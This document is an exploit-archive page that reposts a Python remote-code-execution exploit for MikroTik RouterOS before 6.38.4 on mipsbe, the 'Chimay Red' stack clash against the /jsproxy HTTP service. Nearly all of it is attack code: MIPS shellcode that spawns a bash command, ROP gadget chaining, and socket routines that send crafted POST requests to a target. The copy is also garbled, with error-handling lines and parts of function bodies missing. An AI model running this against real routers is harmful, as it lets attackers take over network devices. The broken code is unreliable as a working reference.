Mikrotik routeros < 6.38.4 (mipsbe) chimay red stack clash remote code execution Vulnerability / Exploit

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Exploits / Vulnerability Discovered : 2018-03-12 | Type : remote | Platform : hardware
This exploit / vulnerability Mikrotik routeros < 6.38.4 (mipsbe) chimay red stack clash remote code execution is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

#!/usr/bin/env python3

# Mikrotik Chimay Red Stack Clash Exploit by BigNerd95

# Tested on RouterOS 6.38.4 (mipsbe) [using a CRS109]

# Used tools: pwndbg, rasm2, mipsrop for IDA
# I used ropper only to automatically find gadgets

# ASLR enabled on libs only
# DEP NOT enabled

import socket, time, sys, struct, re
from ropper import RopperService

AST_STACKSIZE = 0x800000 # default stack size per thread (8 MB)
ROS_STACKSIZE = 0x20000 # newer version of ROS have a different stack size per thread (128 KB)
SKIP_SPACE = 0x1000 # 4 KB of "safe" space for the stack of thread 2
ROP_SPACE = 0x8000 # we can send 32 KB of ROP chain!

ALIGN_SIZE = 0x10 # alloca align memory with "content-length + 0x10 & 0xF" so we need to take it into account
ADDRESS_SIZE = 0x4 # we need to overwrite a return address to start the ROP chain

class MyRopper():
def __init__(self, filename):
self.rs = RopperService()


self.rs.options.inst_count = 10
self.rs.loadGadgetsFor() # sometimes Ropper doesn't update new gadgets

def get_gadgets(self, regex):
gadgets = []
for _, g in self.rs.search(search=regex):

if len(gadgets) > 0:
return gadgets
raise Exception("Cannot find gadgets!")

def contains_string(self, string):
s = self.rs.searchString(string)
t = [a for a in s.values()][0]
return len(t) > 0

def get_arch(self):
return self.rs.files[0].arch._name

def get_ra_offset(gadget):
Return the offset of next Retun Address on the stack
So you know how many bytes to put before next gadget address
lw $ra, 0xAB ($sp) --> return: 0xAB
for line in gadget.lines:
offset_len = re.findall("lw \$ra, (0x[0-9a-f]+)\(\$sp\)", line[1])
if offset_len:
return int(offset_len[0], 16)
raise Exception("Cannot find $ra offset in this gadget!")

def makeHeader(num):
return b"POST /jsproxy HTTP/1.1\r\nContent-Length: " + bytes(str(num), 'ascii') + b"\r\n\r\n"

def makeSocket(ip, port):
s = socket.socket()
s.connect((ip, port))
print("Error connecting to socket")
return s

def socketSend(s, data):
print("Error sending data")

def build_shellcode(shellCmd):
shell_code = b''
shellCmd = bytes(shellCmd, "ascii")

# Here the shellcode will write the arguments for execve: ["/bin/bash", "-c", "shellCmd", NULL] and [NULL]
# XX XX XX XX <-- here the shell code will write the address of string "/bin/bash" [shellcode_start_address -16] <--- argv_array
# XX XX XX XX <-- here the shell code will write the address of string "-c" [shellcode_start_address -12]
# XX XX XX XX <-- here the shell code will write the address of string "shellCmd" [shellcode_start_address -8]
# XX XX XX XX <-- here the shell code will write 0x00000000 (used as end of argv_array and as envp_array) [shellcode_start_address -4] <--- envp_array

# The shell code execution starts here!
shell_code += struct.pack('>L', 0x24500000) # addiu s0, v0, 0 # s0 = v0 Save the shellcode_start_address in s0 (in v0 we have the address of the stack where the shellcode starts [<-- pointing to this location exactly])
shell_code += struct.pack('>L', 0x24020fa2) # addiu v0, zero, 0xfa2 # v0 = 4002 (fork) Put the syscall number of fork (4002) in v0
shell_code += struct.pack('>L', 0x0000000c) # syscall # launch syscall Start fork()
shell_code += struct.pack('>L', 0x10400003) # beqz v0, 0x10 # jump 12 byte forward if v0 == 0 Jump to execve part of the shellcode if PID is 0

# if v0 != 0 [res of fork()]
shell_code += struct.pack('>L', 0x24020001) # addiu v0, zero, 1 # a0 = 1 Put exit parameter in a0
shell_code += struct.pack('>L', 0x24020fa1) # addiu v0, zero, 0xfa1 # v0 = 4001 (exit) Put the syscall number of exit (4002) in v0
shell_code += struct.pack('>L', 0x0000000c) # syscall # launch syscall Start exit(1)

# if v0 == 0 [res of fork()]
shell_code += struct.pack('>L', 0x26040050) # addiu a0, s0, 0x50 # a0 = shellcode_start_address + 0x50 Calculate the address of string "/bin/bash" and put it in a0 (the first parameter of execve)
shell_code += struct.pack('>L', 0xae04fff0) # sw a0, -16(s0) # shellcode_start_address[-16] = bin_bash_address Write in the first entry of the "argv" array the address of the string "/bin/bash"
shell_code += struct.pack('>L', 0x26110060) # addiu s1, s0, 0x60 # s1 = shellcode_start_address + 0x60 Calculate the address of string "-c" and put it in s1
shell_code += struct.pack('>L', 0xae11fff4) # sw s1, -12(s0) # shellcode_start_address[-12] = c_address Write in the second entry of the "argv" array the address of the string "-c"
shell_code += struct.pack('>L', 0x26110070) # addiu s1, s0, 0x70 # s1 = shellcode_start_address + 0x70 Calculate the address of string "shellCmd" and put it in s1
shell_code += struct.pack('>L', 0xae11fff8) # sw s1, -8(s0) # shellcode_start_address[-8] = shellCmd_address Write in the third entry of the "argv" array the address of the string "shellCmd"
shell_code += struct.pack('>L', 0xae00fffc) # sw zero, -4(s0) # shellcode_start_address[-4] = 0x00 Write NULL address as end of argv_array and envp_array
shell_code += struct.pack('>L', 0x2205fff0) # addi a1, s0, -16 # a1 = shellcode_start_address - 16 Put the address of argv_array in a1 (the second parameter of execve)
shell_code += struct.pack('>L', 0x2206fffc) # addi a2, s0, -4 # a2 = shellcode_start_address - 4 Put the address of envp_array in a2 (the third parameter of execve)
shell_code += struct.pack('>L', 0x24020fab) # addiu v0, zero, 0xfab # v0 = 4011 (execve) Put the syscall number of execve (4011) in v0 (https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/arch/mips/include/uapi/asm/unistd.h)
shell_code += struct.pack('>L', 0x0000000c) # syscall # launch syscall Start execve("/bin/bash", ["/bin/bash", "-c", "shellCmd", NULL], [NULL])

shell_code += b'P' * (0x50 - len(shell_code)) # offset to simplify string address calculation
shell_code += b'/bin/bash\x00' # (Warning: do not exceed 16 bytes!) [shellcode_start + 0x50] <--- bin_bash_address

shell_code += b'P' * (0x60 - len(shell_code)) # offset to simplify string address calculation
shell_code += b'-c\x00' # (Warning: do not exceed 16 bytes!) [shellcode_start + 0x60] <--- c_address

shell_code += b'P' * (0x70 - len(shell_code)) # offset to simplify string address calculation
shell_code += shellCmd + b'\x00' # [shellcode_start + 0x70] <--- shellCmd_address

return shell_code

def build_payload(binRop, shellCmd):
print("Building shellcode + ROP chain...")

ropChain = b''
shell_code = build_shellcode(shellCmd)

# 1) Stack finder gadget (to make stack pivot)
stack_finder = binRop.get_gadgets("addiu ?a0, ?sp, 0x18; lw ?ra, 0x???(?sp% jr ?ra;")[0]
0x0040ae04: (ROS 6.38.4)
addiu $a0, $sp, 0x18 <--- needed action
lw $ra, 0x5fc($sp) <--- jump control [0x5fc, a lot of space for the shellcode!]
lw $s3, 0x5f8($sp)
lw $s2, 0x5f4($sp)
lw $s1, 0x5f0($sp)
lw $s0, 0x5ec($sp)
move $v0, $zero
jr $ra
ropChain += struct.pack('>L', stack_finder.address)
# Action: addiu $a0, $sp, 0x600 + var_5E8 # a0 = stackpointer + 0x18
# Control Jump: jr 0x600 + var_4($sp)
# This gadget (moreover) allows us to reserve 1512 bytes inside the rop chain
# to store the shellcode (beacuse of: jr 0x600 + var_4($sp))
ropChain += b'B' * 0x18 # 0x600 - 0x5E8 = 0x18 (in the last 16 bytes of this offset the shell code will write the arguments for execve)
ropChain += shell_code # write the shell code in this "big" offset

next_gadget_offset = MyRopper.get_ra_offset(stack_finder) - 0x18 - len(shell_code)
if next_gadget_offset < 0: # check if shell command fits inside this big offset
raise Exception("Shell command too long! Max len: " + str(next_gadget_offset + len(shellCmd)) + " bytes")

ropChain += b'C' * next_gadget_offset # offset because of this: 0x600 + var_4($sp)

# 2) Copy a0 in v0 because of next gadget
mov_v0_a0 = binRop.get_gadgets("lw ?ra, %move ?v0, ?a0;% jr ?ra;")[0]
0x00414E58: (ROS 6.38.4)
lw $ra, 0x24($sp); <--- jump control
lw $s2, 0x20($sp);
lw $s1, 0x1c($sp);
lw $s0, 0x18($sp);
move $v0, $a0; <--- needed action
jr $ra;
ropChain += struct.pack('>L', mov_v0_a0.address)
# Gadget Action: move $v0, $a0 # v0 = a0
# Gadget Control: jr 0x28 + var_4($sp)
ropChain += b'D' * MyRopper.get_ra_offset(mov_v0_a0) # offset because of this: 0x28 + var_4($sp)

# 3) Jump to the stack (start shell code)
jump_v0 = binRop.get_gadgets("move ?t9, ?v0; jalr ?t9;")[0]
0x00412540: (ROS 6.38.4)
move $t9, $v0; <--- jump control
jalr $t9; <--- needed action
ropChain += struct.pack('>L', jump_v0.address)
# Gadget Action: jalr $t9 # jump v0
# Gadget Control: jalr $v0

return ropChain

def stackClash(ip, port, payload):

print("Opening 2 sockets")

# 1) Start 2 threads
# open 2 socket so 2 threads are created
s1 = makeSocket(ip, port) # socket 1, thread A
s2 = makeSocket(ip, port) # socket 2, thread B

print("Stack clash...")

# 2) Stack Clash
# 2.1) send post header with Content-Length bigger than AST_STACKSIZE to socket 1 (thread A)
socketSend(s1, makeHeader(AST_STACKSIZE + SKIP_SPACE + ROP_SPACE)) # thanks to alloca, the Stack Pointer of thread A will point inside the stack frame of thread B (the post_data buffer will start from here)

# 2.2) send some bytes as post data to socket 1 (thread A)
socketSend(s1, b'A'*(SKIP_SPACE - ALIGN_SIZE - ADDRESS_SIZE)) # increase the post_data buffer pointer of thread A to a position where a return address of thread B will be saved

# 2.3) send post header with Content-Length to reserve ROP space to socket 2 (thread B)
socketSend(s2, makeHeader(ROP_SPACE)) # thanks to alloca, the Stack Pointer of thread B will point where post_data buffer pointer of thread A is positioned

print("Sending payload")

# 3) Send ROP chain and shell code
socketSend(s1, payload)

print("Starting exploit")

# 4) Start ROP chain
s2.close() # close socket 2 to return from the function of thread B and start ROP chain


def crash(ip, port):
s = makeSocket(ip, port)
socketSend(s, makeHeader(-1))
socketSend(s, b'A' * 0x1000)
time.sleep(2.5) # www takes up to 3 seconds to restart

if __name__ == "__main__":
if len(sys.argv) == 5:
ip = sys.argv[1]
port = int(sys.argv[2])
binary = sys.argv[3]
shellCmd = sys.argv[4]

binRop = MyRopper(binary)

if binRop.get_arch() != 'MIPSBE':
raise Exception("Wrong architecture! You have to pass a mipsbe executable")

if binRop.contains_string("pthread_attr_setstacksize"):

payload = build_payload(binRop, shellCmd)

crash(ip, port) # should make stack clash more reliable
stackClash(ip, port, payload)
print("Usage: " + sys.argv[0] + " IP PORT binary shellcommand")